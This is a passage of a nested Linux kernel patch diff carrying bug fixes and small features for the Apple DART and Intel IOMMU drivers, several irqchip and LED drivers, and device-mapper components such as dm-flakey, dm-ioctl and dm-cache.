+ 		apple_dart_hw_invalidate_tlb(&stream_map);
+ 	}
+ }
+@@ -413,7 +429,7 @@ static int apple_dart_finalize_domain(struct iommu_domain *domain,
+ 	struct apple_dart *dart = cfg->stream_maps[0].dart;
+ 	struct io_pgtable_cfg pgtbl_cfg;
+ 	int ret = 0;
+-	int i;
++	int i, j;
+ 
+ 	mutex_lock(&dart_domain->init_lock);
+ 
+@@ -422,8 +438,9 @@ static int apple_dart_finalize_domain(struct iommu_domain *domain,
+ 
+ 	for (i = 0; i < MAX_DARTS_PER_DEVICE; ++i) {
+ 		dart_domain->stream_maps[i].dart = cfg->stream_maps[i].dart;
+-		atomic64_set(&dart_domain->stream_maps[i].sidmap,
+-			     cfg->stream_maps[i].sidmap);
++		for (j = 0; j < BITS_TO_LONGS(dart->num_streams); j++)
++			atomic_long_set(&dart_domain->stream_maps[i].sidmap[j],
++					cfg->stream_maps[i].sidmap[j]);
+ 	}
+ 
+ 	pgtbl_cfg = (struct io_pgtable_cfg){
+@@ -458,7 +475,7 @@ apple_dart_mod_streams(struct apple_dart_atomic_stream_map *domain_maps,
+ 		       struct apple_dart_stream_map *master_maps,
+ 		       bool add_streams)
+ {
+-	int i;
++	int i, j;
+ 
+ 	for (i = 0; i < MAX_DARTS_PER_DEVICE; ++i) {
+ 		if (domain_maps[i].dart != master_maps[i].dart)
+@@ -468,12 +485,14 @@ apple_dart_mod_streams(struct apple_dart_atomic_stream_map *domain_maps,
+ 	for (i = 0; i < MAX_DARTS_PER_DEVICE; ++i) {
+ 		if (!domain_maps[i].dart)
+ 			break;
+-		if (add_streams)
+-			atomic64_or(master_maps[i].sidmap,
+-				    &domain_maps[i].sidmap);
+-		else
+-			atomic64_and(~master_maps[i].sidmap,
+-				     &domain_maps[i].sidmap);
++		for (j = 0; j < BITS_TO_LONGS(domain_maps[i].dart->num_streams); j++) {
++			if (add_streams)
++				atomic_long_or(master_maps[i].sidmap[j],
++					       &domain_maps[i].sidmap[j]);
++			else
++				atomic_long_and(~master_maps[i].sidmap[j],
++						&domain_maps[i].sidmap[j]);
++		}
+ 	}
+ 
+ 	return 0;
+@@ -637,14 +656,14 @@ static int apple_dart_of_xlate(struct device *dev, struct of_phandle_args *args)
+ 
+ 	for (i = 0; i < MAX_DARTS_PER_DEVICE; ++i) {
+ 		if (cfg->stream_maps[i].dart == dart) {
+-			cfg->stream_maps[i].sidmap |= 1 << sid;
++			set_bit(sid, cfg->stream_maps[i].sidmap);
+ 			return 0;
+ 		}
+ 	}
+ 	for (i = 0; i < MAX_DARTS_PER_DEVICE; ++i) {
+ 		if (!cfg->stream_maps[i].dart) {
+ 			cfg->stream_maps[i].dart = dart;
+-			cfg->stream_maps[i].sidmap = 1 << sid;
++			set_bit(sid, cfg->stream_maps[i].sidmap);
+ 			return 0;
+ 		}
+ 	}
+@@ -663,13 +682,36 @@ static void apple_dart_release_group(void *iommu_data)
+ 	mutex_lock(&apple_dart_groups_lock);
+ 
+ 	for_each_stream_map(i, group_master_cfg, stream_map)
+-		for_each_set_bit(sid, &stream_map->sidmap, DART_MAX_STREAMS)
++		for_each_set_bit(sid, stream_map->sidmap, stream_map->dart->num_streams)
+ 			stream_map->dart->sid2group[sid] = NULL;
+ 
+ 	kfree(iommu_data);
+ 	mutex_unlock(&apple_dart_groups_lock);
+ }
+ 
++static int apple_dart_merge_master_cfg(struct apple_dart_master_cfg *dst,
++				       struct apple_dart_master_cfg *src)
++{
++	/*
++	 * We know that this function is only called for groups returned from
++	 * pci_device_group and that all Apple Silicon platforms never spread
++	 * PCIe devices from the same bus across multiple DARTs such that we can
++	 * just assume that both src and dst only have the same single DART.
++	 */
++	if (src->stream_maps[1].dart)
++		return -EINVAL;
++	if (dst->stream_maps[1].dart)
++		return -EINVAL;
++	if (src->stream_maps[0].dart != dst->stream_maps[0].dart)
++		return -EINVAL;
++
++	bitmap_or(dst->stream_maps[0].sidmap,
++		  dst->stream_maps[0].sidmap,
++		  src->stream_maps[0].sidmap,
++		  dst->stream_maps[0].dart->num_streams);
++	return 0;
++}
++
+ static struct iommu_group *apple_dart_device_group(struct device *dev)
+ {
+ 	int i, sid;
+@@ -682,7 +724,7 @@ static struct iommu_group *apple_dart_device_group(struct device *dev)
+ 	mutex_lock(&apple_dart_groups_lock);
+ 
+ 	for_each_stream_map(i, cfg, stream_map) {
+-		for_each_set_bit(sid, &stream_map->sidmap, DART_MAX_STREAMS) {
++		for_each_set_bit(sid, stream_map->sidmap, stream_map->dart->num_streams) {
+ 			struct iommu_group *stream_group =
+ 				stream_map->dart->sid2group[sid];
+ 
+@@ -711,17 +753,31 @@ static struct iommu_group *apple_dart_device_group(struct device *dev)
+ 	if (!group)
+ 		goto out;
+ 
+-	group_master_cfg = kmemdup(cfg, sizeof(*group_master_cfg), GFP_KERNEL);
+-	if (!group_master_cfg) {
+-		iommu_group_put(group);
+-		goto out;
+-	}
++	group_master_cfg = iommu_group_get_iommudata(group);
++	if (group_master_cfg) {
++		int ret;
++
++		ret = apple_dart_merge_master_cfg(group_master_cfg, cfg);
++		if (ret) {
++			dev_err(dev, "Failed to merge DART IOMMU grups.\n");
++			iommu_group_put(group);
++			res = ERR_PTR(ret);
++			goto out;
++		}
++	} else {
++		group_master_cfg = kmemdup(cfg, sizeof(*group_master_cfg),
++					   GFP_KERNEL);
++		if (!group_master_cfg) {
++			iommu_group_put(group);
++			goto out;
++		}
+ 
+-	iommu_group_set_iommudata(group, group_master_cfg,
+-		apple_dart_release_group);
++		iommu_group_set_iommudata(group, group_master_cfg,
++			apple_dart_release_group);
++	}
+ 
+ 	for_each_stream_map(i, cfg, stream_map)
+-		for_each_set_bit(sid, &stream_map->sidmap, DART_MAX_STREAMS)
++		for_each_set_bit(sid, stream_map->sidmap, stream_map->dart->num_streams)
+ 			stream_map->dart->sid2group[sid] = group;
+ 
+ 	res = group;
+@@ -866,16 +922,26 @@ static int apple_dart_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = apple_dart_hw_reset(dart);
+-	if (ret)
+-		goto err_clk_disable;
+-
+ 	dart_params[0] = readl(dart->regs + DART_PARAMS1);
+ 	dart_params[1] = readl(dart->regs + DART_PARAMS2);
+ 	dart->pgsize = 1 << FIELD_GET(DART_PARAMS_PAGE_SHIFT, dart_params[0]);
+ 	dart->supports_bypass = dart_params[1] & DART_PARAMS_BYPASS_SUPPORT;
++
++	dart->num_streams = dart->hw->max_sid_count;
++
++	if (dart->num_streams > DART_MAX_STREAMS) {
++		dev_err(&pdev->dev, "Too many streams (%d > %d)\n",
++			dart->num_streams, DART_MAX_STREAMS);
++		ret = -EINVAL;
++		goto err_clk_disable;
++	}
++
+ 	dart->force_bypass = dart->pgsize > PAGE_SIZE;
+ 
++	ret = apple_dart_hw_reset(dart);
++	if (ret)
++		goto err_clk_disable;
++
+ 	ret = request_irq(dart->irq, apple_dart_irq, IRQF_SHARED,
+ 			  "apple-dart fault handler", dart);
+ 	if (ret)
+@@ -894,8 +960,8 @@ static int apple_dart_probe(struct platform_device *pdev)
+ 
+ 	dev_info(
+ 		&pdev->dev,
+-		"DART [pagesize %x, bypass support: %d, bypass forced: %d] initialized\n",
+-		dart->pgsize, dart->supports_bypass, dart->force_bypass);
++		"DART [pagesize %x, %d streams, bypass support: %d, bypass forced: %d] initialized\n",
++		dart->pgsize, dart->num_streams, dart->supports_bypass, dart->force_bypass);
+ 	return 0;
+ 
+ err_sysfs_remove:
+@@ -926,12 +992,53 @@ static int apple_dart_remove(struct platform_device *pdev)
+ static const struct apple_dart_hw apple_dart_hw_t8103 = {
+ 	.oas = 36,
+ 	.fmt = APPLE_DART,
++	.max_sid_count = 16,
+ };
+ static const struct apple_dart_hw apple_dart_hw_t6000 = {
+ 	.oas = 42,
+ 	.fmt = APPLE_DART2,
++	.max_sid_count = 16,
+ };
+ 
++static __maybe_unused int apple_dart_suspend(struct device *dev)
++{
++	struct apple_dart *dart = dev_get_drvdata(dev);
++	unsigned int sid, idx;
++
++	for (sid = 0; sid < dart->num_streams; sid++) {
++		dart->save_tcr[sid] = readl_relaxed(dart->regs + DART_TCR(sid));
++		for (idx = 0; idx < DART_MAX_TTBR; idx++)
++			dart->save_ttbr[sid][idx] =
++				readl(dart->regs + DART_TTBR(sid, idx));
++	}
++
++	return 0;
++}
++
++static __maybe_unused int apple_dart_resume(struct device *dev)
++{
++	struct apple_dart *dart = dev_get_drvdata(dev);
++	unsigned int sid, idx;
++	int ret;
++
++	ret = apple_dart_hw_reset(dart);
++	if (ret) {
++		dev_err(dev, "Failed to reset DART on resume\n");
++		return ret;
++	}
++
++	for (sid = 0; sid < dart->num_streams; sid++) {
++		for (idx = 0; idx < DART_MAX_TTBR; idx++)
++			writel(dart->save_ttbr[sid][idx],
++			       dart->regs + DART_TTBR(sid, idx));
++		writel(dart->save_tcr[sid], dart->regs + DART_TCR(sid));
++	}
++
++	return 0;
++}
++
++DEFINE_SIMPLE_DEV_PM_OPS(apple_dart_pm_ops, apple_dart_suspend, apple_dart_resume);
++
+ static const struct of_device_id apple_dart_of_match[] = {
+ 	{ .compatible = "apple,t8103-dart", .data = &apple_dart_hw_t8103 },
+ 	{ .compatible = "apple,t6000-dart", .data = &apple_dart_hw_t6000 },
+@@ -944,6 +1051,7 @@ static struct platform_driver apple_dart_driver = {
+ 		.name			= "apple-dart",
+ 		.of_match_table		= apple_dart_of_match,
+ 		.suppress_bind_attrs    = true,
++		.pm			= pm_sleep_ptr(&apple_dart_pm_ops),
+ 	},
+ 	.probe	= apple_dart_probe,
+ 	.remove	= apple_dart_remove,
+diff --git a/drivers/iommu/intel/iommu.c b/drivers/iommu/intel/iommu.c
+index 644ca49e8cf80..d4b5d20bd6dda 100644
+--- a/drivers/iommu/intel/iommu.c
++++ b/drivers/iommu/intel/iommu.c
+@@ -4051,7 +4051,8 @@ int __init intel_iommu_init(void)
+ 		 * is likely to be much lower than the overhead of synchronizing
+ 		 * the virtual and physical IOMMU page-tables.
+ 		 */
+-		if (cap_caching_mode(iommu->cap)) {
++		if (cap_caching_mode(iommu->cap) &&
++		    !first_level_by_default(IOMMU_DOMAIN_DMA)) {
+ 			pr_info_once("IOMMU batching disallowed due to virtualization\n");
+ 			iommu_set_dma_strict();
+ 		}
+@@ -4358,7 +4359,12 @@ static size_t intel_iommu_unmap(struct iommu_domain *domain,
+ 	if (dmar_domain->max_addr == iova + size)
+ 		dmar_domain->max_addr = iova;
+ 
+-	iommu_iotlb_gather_add_page(domain, gather, iova, size);
++	/*
++	 * We do not use page-selective IOTLB invalidation in flush queue,
++	 * so there is no need to track page and sync iotlb.
++	 */
++	if (!iommu_iotlb_gather_queued(gather))
++		iommu_iotlb_gather_add_page(domain, gather, iova, size);
+ 
+ 	return size;
+ }
+@@ -4636,8 +4642,12 @@ static int intel_iommu_enable_sva(struct device *dev)
+ 		return -EINVAL;
+ 
+ 	ret = iopf_queue_add_device(iommu->iopf_queue, dev);
+-	if (!ret)
+-		ret = iommu_register_device_fault_handler(dev, iommu_queue_iopf, dev);
++	if (ret)
++		return ret;
++
++	ret = iommu_register_device_fault_handler(dev, iommu_queue_iopf, dev);
++	if (ret)
++		iopf_queue_remove_device(iommu->iopf_queue, dev);
+ 
+ 	return ret;
+ }
+@@ -4649,8 +4659,12 @@ static int intel_iommu_disable_sva(struct device *dev)
+ 	int ret;
+ 
+ 	ret = iommu_unregister_device_fault_handler(dev);
+-	if (!ret)
+-		ret = iopf_queue_remove_device(iommu->iopf_queue, dev);
++	if (ret)
++		return ret;
++
++	ret = iopf_queue_remove_device(iommu->iopf_queue, dev);
++	if (ret)
++		iommu_register_device_fault_handler(dev, iommu_queue_iopf, dev);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/iommu/intel/pasid.c b/drivers/iommu/intel/pasid.c
+index e13d7e5273e19..a39aab66a01b1 100644
+--- a/drivers/iommu/intel/pasid.c
++++ b/drivers/iommu/intel/pasid.c
+@@ -126,6 +126,9 @@ int intel_pasid_alloc_table(struct device *dev)
+ 	pasid_table->max_pasid = 1 << (order + PAGE_SHIFT + 3);
+ 	info->pasid_table = pasid_table;
+ 
++	if (!ecap_coherent(info->iommu->ecap))
++		clflush_cache_range(pasid_table->table, size);
++
+ 	return 0;
+ }
+ 
+@@ -213,6 +216,10 @@ retry:
+ 			free_pgtable_page(entries);
+ 			goto retry;
+ 		}
++		if (!ecap_coherent(info->iommu->ecap)) {
++			clflush_cache_range(entries, VTD_PAGE_SIZE);
++			clflush_cache_range(&dir[dir_index].val, sizeof(*dir));
++		}
+ 	}
+ 
+ 	return &entries[index];
+@@ -362,6 +369,16 @@ static inline void pasid_set_page_snoop(struct pasid_entry *pe, bool value)
+ 	pasid_set_bits(&pe->val[1], 1 << 23, value << 23);
+ }
+ 
++/*
++ * Setup No Execute Enable bit (Bit 133) of a scalable mode PASID
++ * entry. It is required when XD bit of the first level page table
++ * entry is about to be set.
++ */
++static inline void pasid_set_nxe(struct pasid_entry *pe)
++{
++	pasid_set_bits(&pe->val[2], 1 << 5, 1 << 5);
++}
++
+ /*
+  * Setup the Page Snoop (PGSNP) field (Bit 88) of a scalable mode
+  * PASID entry.
+@@ -555,6 +572,7 @@ int intel_pasid_setup_first_level(struct intel_iommu *iommu,
+ 	pasid_set_domain_id(pte, did);
+ 	pasid_set_address_width(pte, iommu->agaw);
+ 	pasid_set_page_snoop(pte, !!ecap_smpwc(iommu->ecap));
++	pasid_set_nxe(pte);
+ 
+ 	/* Setup Present and PASID Granular Transfer Type: */
+ 	pasid_set_translation_type(pte, PASID_ENTRY_PGTT_FL_ONLY);
+diff --git a/drivers/iommu/iommu.c b/drivers/iommu/iommu.c
+index 959d895fc1dff..fd8c8aeb3c504 100644
+--- a/drivers/iommu/iommu.c
++++ b/drivers/iommu/iommu.c
+@@ -749,12 +749,16 @@ struct iommu_group *iommu_group_alloc(void)
+ 
+ 	ret = iommu_group_create_file(group,
+ 				      &iommu_group_attr_reserved_regions);
+-	if (ret)
++	if (ret) {
++		kobject_put(group->devices_kobj);
+ 		return ERR_PTR(ret);
++	}
+ 
+ 	ret = iommu_group_create_file(group, &iommu_group_attr_type);
+-	if (ret)
++	if (ret) {
++		kobject_put(group->devices_kobj);
+ 		return ERR_PTR(ret);
++	}
+ 
+ 	pr_debug("Allocated group %d\n", group->id);
+ 
+diff --git a/drivers/irqchip/irq-alpine-msi.c b/drivers/irqchip/irq-alpine-msi.c
+index 5ddb8e578ac6a..fc1ef7de37973 100644
+--- a/drivers/irqchip/irq-alpine-msi.c
++++ b/drivers/irqchip/irq-alpine-msi.c
+@@ -199,6 +199,7 @@ static int alpine_msix_init_domains(struct alpine_msix_data *priv,
+ 	}
+ 
+ 	gic_domain = irq_find_host(gic_node);
++	of_node_put(gic_node);
+ 	if (!gic_domain) {
+ 		pr_err("Failed to find the GIC domain\n");
+ 		return -ENXIO;
+diff --git a/drivers/irqchip/irq-bcm7120-l2.c b/drivers/irqchip/irq-bcm7120-l2.c
+index bb6609cebdbce..1e9dab6e0d86f 100644
+--- a/drivers/irqchip/irq-bcm7120-l2.c
++++ b/drivers/irqchip/irq-bcm7120-l2.c
+@@ -279,7 +279,8 @@ static int __init bcm7120_l2_intc_probe(struct device_node *dn,
+ 		flags |= IRQ_GC_BE_IO;
+ 
+ 	ret = irq_alloc_domain_generic_chips(data->domain, IRQS_PER_WORD, 1,
+-				dn->full_name, handle_level_irq, clr, 0, flags);
++				dn->full_name, handle_level_irq, clr,
++				IRQ_LEVEL, flags);
+ 	if (ret) {
+ 		pr_err("failed to allocate generic irq chip\n");
+ 		goto out_free_domain;
+diff --git a/drivers/irqchip/irq-brcmstb-l2.c b/drivers/irqchip/irq-brcmstb-l2.c
+index e4efc08ac5948..091b0fe7e3242 100644
+--- a/drivers/irqchip/irq-brcmstb-l2.c
++++ b/drivers/irqchip/irq-brcmstb-l2.c
+@@ -161,6 +161,7 @@ static int __init brcmstb_l2_intc_of_init(struct device_node *np,
+ 					  *init_params)
+ {
+ 	unsigned int clr = IRQ_NOREQUEST | IRQ_NOPROBE | IRQ_NOAUTOEN;
++	unsigned int set = 0;
+ 	struct brcmstb_l2_intc_data *data;
+ 	struct irq_chip_type *ct;
+ 	int ret;
+@@ -208,9 +209,12 @@ static int __init brcmstb_l2_intc_of_init(struct device_node *np,
+ 	if (IS_ENABLED(CONFIG_MIPS) && IS_ENABLED(CONFIG_CPU_BIG_ENDIAN))
+ 		flags |= IRQ_GC_BE_IO;
+ 
++	if (init_params->handler == handle_level_irq)
++		set |= IRQ_LEVEL;
++
+ 	/* Allocate a single Generic IRQ chip for this node */
+ 	ret = irq_alloc_domain_generic_chips(data->domain, 32, 1,
+-			np->full_name, init_params->handler, clr, 0, flags);
++			np->full_name, init_params->handler, clr, set, flags);
+ 	if (ret) {
+ 		pr_err("failed to allocate generic irq chip\n");
+ 		goto out_free_domain;
+diff --git a/drivers/irqchip/irq-mvebu-gicp.c b/drivers/irqchip/irq-mvebu-gicp.c
+index fe88a782173dd..c43a345061d53 100644
+--- a/drivers/irqchip/irq-mvebu-gicp.c
++++ b/drivers/irqchip/irq-mvebu-gicp.c
+@@ -221,6 +221,7 @@ static int mvebu_gicp_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	parent_domain = irq_find_host(irq_parent_dn);
++	of_node_put(irq_parent_dn);
+ 	if (!parent_domain) {
+ 		dev_err(&pdev->dev, "failed to find parent IRQ domain\n");
+ 		return -ENODEV;
+diff --git a/drivers/irqchip/irq-ti-sci-intr.c b/drivers/irqchip/irq-ti-sci-intr.c
+index fe8fad22bcf96..020ddf29efb80 100644
+--- a/drivers/irqchip/irq-ti-sci-intr.c
++++ b/drivers/irqchip/irq-ti-sci-intr.c
+@@ -236,6 +236,7 @@ static int ti_sci_intr_irq_domain_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	parent_domain = irq_find_host(parent_node);
++	of_node_put(parent_node);
+ 	if (!parent_domain) {
+ 		dev_err(dev, "Failed to find IRQ parent domain\n");
+ 		return -ENODEV;
+diff --git a/drivers/irqchip/irqchip.c b/drivers/irqchip/irqchip.c
+index 3570f0a588c4b..7899607fbee8d 100644
+--- a/drivers/irqchip/irqchip.c
++++ b/drivers/irqchip/irqchip.c
+@@ -38,8 +38,10 @@ int platform_irqchip_probe(struct platform_device *pdev)
+ 	struct device_node *par_np = of_irq_find_parent(np);
+ 	of_irq_init_cb_t irq_init_cb = of_device_get_match_data(&pdev->dev);
+ 
+-	if (!irq_init_cb)
++	if (!irq_init_cb) {
++		of_node_put(par_np);
+ 		return -EINVAL;
++	}
+ 
+ 	if (par_np == np)
+ 		par_np = NULL;
+@@ -52,8 +54,10 @@ int platform_irqchip_probe(struct platform_device *pdev)
+ 	 * interrupt controller. The actual initialization callback of this
+ 	 * interrupt controller can check for specific domains as necessary.
+ 	 */
+-	if (par_np && !irq_find_matching_host(par_np, DOMAIN_BUS_ANY))
++	if (par_np && !irq_find_matching_host(par_np, DOMAIN_BUS_ANY)) {
++		of_node_put(par_np);
+ 		return -EPROBE_DEFER;
++	}
+ 
+ 	return irq_init_cb(np, par_np);
+ }
+diff --git a/drivers/leds/led-class.c b/drivers/leds/led-class.c
+index 6a8ea94834fa3..aa39b2a48fdff 100644
+--- a/drivers/leds/led-class.c
++++ b/drivers/leds/led-class.c
+@@ -235,14 +235,17 @@ struct led_classdev *of_led_get(struct device_node *np, int index)
+ 
+ 	led_dev = class_find_device_by_of_node(leds_class, led_node);
+ 	of_node_put(led_node);
++	put_device(led_dev);
+ 
+ 	if (!led_dev)
+ 		return ERR_PTR(-EPROBE_DEFER);
+ 
+ 	led_cdev = dev_get_drvdata(led_dev);
+ 
+-	if (!try_module_get(led_cdev->dev->parent->driver->owner))
++	if (!try_module_get(led_cdev->dev->parent->driver->owner)) {
++		put_device(led_cdev->dev);
+ 		return ERR_PTR(-ENODEV);
++	}
+ 
+ 	return led_cdev;
+ }
+@@ -255,6 +258,7 @@ EXPORT_SYMBOL_GPL(of_led_get);
+ void led_put(struct led_classdev *led_cdev)
+ {
+ 	module_put(led_cdev->dev->parent->driver->owner);
++	put_device(led_cdev->dev);
+ }
+ EXPORT_SYMBOL_GPL(led_put);
+ 
+diff --git a/drivers/leds/leds-is31fl319x.c b/drivers/leds/leds-is31fl319x.c
+index b2f4c4ec7c567..7c908414ac7e0 100644
+--- a/drivers/leds/leds-is31fl319x.c
++++ b/drivers/leds/leds-is31fl319x.c
+@@ -495,6 +495,11 @@ static inline int is31fl3196_db_to_gain(u32 dezibel)
+ 	return dezibel / IS31FL3196_AUDIO_GAIN_DB_STEP;
+ }
+ 
++static void is31f1319x_mutex_destroy(void *lock)
++{
++	mutex_destroy(lock);
++}
++
+ static int is31fl319x_probe(struct i2c_client *client)
+ {
+ 	struct is31fl319x_chip *is31;
+@@ -511,7 +516,7 @@ static int is31fl319x_probe(struct i2c_client *client)
+ 		return -ENOMEM;
+ 
+ 	mutex_init(&is31->lock);
+-	err = devm_add_action(dev, (void (*)(void *))mutex_destroy, &is31->lock);
++	err = devm_add_action_or_reset(dev, is31f1319x_mutex_destroy, &is31->lock);
+ 	if (err)
+ 		return err;
+ 
+diff --git a/drivers/leds/simple/simatic-ipc-leds-gpio.c b/drivers/leds/simple/simatic-ipc-leds-gpio.c
+index 07f0d79d604d4..e8d329b5a68c3 100644
+--- a/drivers/leds/simple/simatic-ipc-leds-gpio.c
++++ b/drivers/leds/simple/simatic-ipc-leds-gpio.c
+@@ -77,6 +77,8 @@ static int simatic_ipc_leds_gpio_probe(struct platform_device *pdev)
+ 
+ 	switch (plat->devmode) {
+ 	case SIMATIC_IPC_DEVICE_127E:
++		if (!IS_ENABLED(CONFIG_PINCTRL_BROXTON))
++			return -ENODEV;
+ 		simatic_ipc_led_gpio_table = &simatic_ipc_led_gpio_table_127e;
+ 		break;
+ 	case SIMATIC_IPC_DEVICE_227G:
+diff --git a/drivers/md/dm-bufio.c b/drivers/md/dm-bufio.c
+index bb786c39545ec..19caaf684ee34 100644
+--- a/drivers/md/dm-bufio.c
++++ b/drivers/md/dm-bufio.c
+@@ -1833,7 +1833,7 @@ struct dm_bufio_client *dm_bufio_client_create(struct block_device *bdev, unsign
+ 	c->shrinker.scan_objects = dm_bufio_shrink_scan;
+ 	c->shrinker.seeks = 1;
+ 	c->shrinker.batch = 0;
+-	r = register_shrinker(&c->shrinker, "md-%s:(%u:%u)", slab_name,
++	r = register_shrinker(&c->shrinker, "dm-bufio:(%u:%u)",
+ 			      MAJOR(bdev->bd_dev), MINOR(bdev->bd_dev));
+ 	if (r)
+ 		goto bad;
+diff --git a/drivers/md/dm-cache-background-tracker.c b/drivers/md/dm-cache-background-tracker.c
+index 84814e819e4c3..7887f99b82bd5 100644
+--- a/drivers/md/dm-cache-background-tracker.c
++++ b/drivers/md/dm-cache-background-tracker.c
+@@ -60,6 +60,14 @@ EXPORT_SYMBOL_GPL(btracker_create);
+ 
+ void btracker_destroy(struct background_tracker *b)
+ {
++	struct bt_work *w, *tmp;
++
++	BUG_ON(!list_empty(&b->issued));
++	list_for_each_entry_safe (w, tmp, &b->queued, list) {
++		list_del(&w->list);
++		kmem_cache_free(b->work_cache, w);
++	}
++
+ 	kmem_cache_destroy(b->work_cache);
+ 	kfree(b);
+ }
+diff --git a/drivers/md/dm-cache-target.c b/drivers/md/dm-cache-target.c
+index 5e92fac90b675..17fde3e5a1f7b 100644
+--- a/drivers/md/dm-cache-target.c
++++ b/drivers/md/dm-cache-target.c
+@@ -1805,6 +1805,7 @@ static void process_deferred_bios(struct work_struct *ws)
+ 
+ 		else
+ 			commit_needed = process_bio(cache, bio) || commit_needed;
++		cond_resched();
+ 	}
+ 
+ 	if (commit_needed)
+@@ -1827,6 +1828,7 @@ static void requeue_deferred_bios(struct cache *cache)
+ 	while ((bio = bio_list_pop(&bios))) {
+ 		bio->bi_status = BLK_STS_DM_REQUEUE;
+ 		bio_endio(bio);
++		cond_resched();
+ 	}
+ }
+ 
+@@ -1867,6 +1869,8 @@ static void check_migrations(struct work_struct *ws)
+ 		r = mg_start(cache, op, NULL);
+ 		if (r)
+ 			break;
++
++		cond_resched();
+ 	}
+ }
+ 
+diff --git a/drivers/md/dm-flakey.c b/drivers/md/dm-flakey.c
+index 89fa7a68c6c42..335684a1aeaa5 100644
+--- a/drivers/md/dm-flakey.c
++++ b/drivers/md/dm-flakey.c
+@@ -303,9 +303,13 @@ static void corrupt_bio_data(struct bio *bio, struct flakey_c *fc)
+ 	 */
+ 	bio_for_each_segment(bvec, bio, iter) {
+ 		if (bio_iter_len(bio, iter) > corrupt_bio_byte) {
+-			char *segment = (page_address(bio_iter_page(bio, iter))
+-					 + bio_iter_offset(bio, iter));
++			char *segment;
++			struct page *page = bio_iter_page(bio, iter);
++			if (unlikely(page == ZERO_PAGE(0)))
++				break;
++			segment = bvec_kmap_local(&bvec);
+ 			segment[corrupt_bio_byte] = fc->corrupt_bio_value;
++			kunmap_local(segment);
+ 			DMDEBUG("Corrupting data bio=%p by writing %u to byte %u "
+ 				"(rw=%c bi_opf=%u bi_sector=%llu size=%u)\n",
+ 				bio, fc->corrupt_bio_value, fc->corrupt_bio_byte,
+@@ -361,9 +365,11 @@ static int flakey_map(struct dm_target *ti, struct bio *bio)
+ 		/*
+ 		 * Corrupt matching writes.
+ 		 */
+-		if (fc->corrupt_bio_byte && (fc->corrupt_bio_rw == WRITE)) {
+-			if (all_corrupt_bio_flags_match(bio, fc))
+-				corrupt_bio_data(bio, fc);
++		if (fc->corrupt_bio_byte) {
++			if (fc->corrupt_bio_rw == WRITE) {
++				if (all_corrupt_bio_flags_match(bio, fc))
++					corrupt_bio_data(bio, fc);
++			}
+ 			goto map_bio;
+ 		}
+ 
+@@ -389,13 +395,14 @@ static int flakey_end_io(struct dm_target *ti, struct bio *bio,
+ 		return DM_ENDIO_DONE;
+ 
+ 	if (!*error && pb->bio_submitted && (bio_data_dir(bio) == READ)) {
+-		if (fc->corrupt_bio_byte && (fc->corrupt_bio_rw == READ) &&
+-		    all_corrupt_bio_flags_match(bio, fc)) {
+-			/*
+-			 * Corrupt successful matching READs while in down state.
+-			 */
+-			corrupt_bio_data(bio, fc);
+-
++		if (fc->corrupt_bio_byte) {
++			if ((fc->corrupt_bio_rw == READ) &&
++			    all_corrupt_bio_flags_match(bio, fc)) {
++				/*
++				 * Corrupt successful matching READs while in down state.
++				 */
++				corrupt_bio_data(bio, fc);
++			}
+ 		} else if (!test_bit(DROP_WRITES, &fc->flags) &&
+ 			   !test_bit(ERROR_WRITES, &fc->flags)) {
+ 			/*
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index 3bfc1583c20a2..fdb7846a97a40 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -482,7 +482,7 @@ static struct mapped_device *dm_hash_rename(struct dm_ioctl *param,
+ 		dm_table_event(table);
+ 	dm_put_live_table(hc->md, srcu_idx);
+ 
+-	if (!dm_kobject_uevent(hc->md, KOBJ_CHANGE, param->event_nr))
++	if (!dm_kobject_uevent(hc->md, KOBJ_CHANGE, param->event_nr, false))
+ 		param->flags |= DM_UEVENT_GENERATED_FLAG;
+ 
+ 	md = hc->md;
+@@ -995,7 +995,7 @@ static int dev_remove(struct file *filp, struct dm_ioctl *param, size_t param_si
+ 
+ 	dm_ima_measure_on_device_remove(md, false);
+ 
+-	if (!dm_kobject_uevent(md, KOBJ_REMOVE, param->event_nr))
++	if (!dm_kobject_uevent(md, KOBJ_REMOVE, param->event_nr, false))
+ 		param->flags |= DM_UEVENT_GENERATED_FLAG;
+ 
+ 	dm_put(md);
+@@ -1129,6 +1129,7 @@ static int do_resume(struct dm_ioctl *param)
+ 	struct hash_cell *hc;
+ 	struct mapped_device *md;
+ 	struct dm_table *new_map, *old_map = NULL;
++	bool need_resize_uevent = false;
+ 
+ 	down_write(&_hash_lock);
+ 
+@@ -1149,6 +1150,8 @@ static int do_resume(struct dm_ioctl *param)
+ 
+ 	/* Do we need to load a new map ? */
+ 	if (new_map) {
++		sector_t old_size, new_size;
++
+ 		/* Suspend if it isn't already suspended */
+ 		if (param->flags & DM_SKIP_LOCKFS_FLAG)
+ 			suspend_flags &= ~DM_SUSPEND_LOCKFS_FLAG;
+@@ -1157,6 +1160,7 @@ static int do_resume(struct dm_ioctl *param)
+ 		if (!dm_suspended_md(md))
+ 			dm_suspend(md, suspend_flags);
+ 
++		old_size = dm_get_size(md);
+ 		old_map = dm_swap_table(md, new_map);
+ 		if (IS_ERR(old_map)) {
+ 			dm_sync_table(md);
+@@ -1164,6 +1168,9 @@ static int do_resume(struct dm_ioctl *param)
+ 			dm_put(md);
+ 			return PTR_ERR(old_map);
+ 		}
++		new_size = dm_get_size(md);
++		if (old_size && new_size && old_size != new_size)
++			need_resize_uevent = true;
+ 
+ 		if (dm_table_get_mode(new_map) & FMODE_WRITE)
+ 			set_disk_ro(dm_disk(md), 0);
+@@ -1176,7 +1183,7 @@ static int do_resume(struct dm_ioctl *param)
+ 		if (!r) {
+ 			dm_ima_measure_on_device_resume(md, new_map ? true : false);
+ 
+-			if (!dm_kobject_uevent(md, KOBJ_CHANGE, param->event_nr))
++			if (!dm_kobject_uevent(md, KOBJ_CHANGE, param->event_nr, need_resize_uevent))
+ 				param->flags |= DM_UEVENT_GENERATED_FLAG;
+ 		}
+ 	}
+diff --git a/drivers/md/dm-thin.c b/drivers/md/dm-thin.c
+index 196f82559ad6b..d28c9077d6ed2 100644
+--- a/drivers/md/dm-thin.c
++++ b/drivers/md/dm-thin.c
+@@ -2207,6 +2207,7 @@ static void process_thin_deferred_bios(struct thin_c *tc)
